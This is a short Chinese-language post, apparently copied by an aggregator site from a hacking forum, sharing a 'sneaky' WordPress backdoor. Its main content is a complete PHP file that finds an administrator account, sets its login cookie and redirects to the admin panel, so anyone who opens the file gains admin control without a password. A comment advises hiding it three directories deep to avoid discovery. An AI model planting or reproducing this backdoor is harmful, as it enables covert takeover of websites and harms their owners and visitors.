猥琐的wordpress后门分享
Posted err0">tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了猥琐的wordpress后门分享相关的知识,希望对你有一定的参考价值。
https://www.t00ls.net/thread-37312-1-1.html
一个可以自动调用管理员帐号登录wordpress后台的方法。
<?php require(‘../../../wp-blog-header.php‘); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。 $query_str = "SELECT ID FROM $wpdb->users"; $user_ids = $wpdb->get_results($query_str); foreach ($user_ids as $uid) { $user_id = $uid->ID; if (user_can($user_id, ‘administrator‘)) { $user_info = get_userdata($user_id); $user_login = $user_info->user_login; wp_set_current_user($user_id, $user_login); wp_set_auth_cookie($user_id); do_action(‘wp_login‘, $user_login); echo "You are logged in as $user_login"; if (function_exists(‘get_admin_url‘)) { wp_redirect(get_admin_url()); } else { wp_redirect(get_bloginfo(‘wpurl‘) . ‘/wp-admin‘); } exit; } } ?>
以上是关于猥琐的wordpress后门分享的主要内容,如果未能解决你的问题,请参考以下文章
Wordpress - 将代码片段包含到布局的选定部分的插件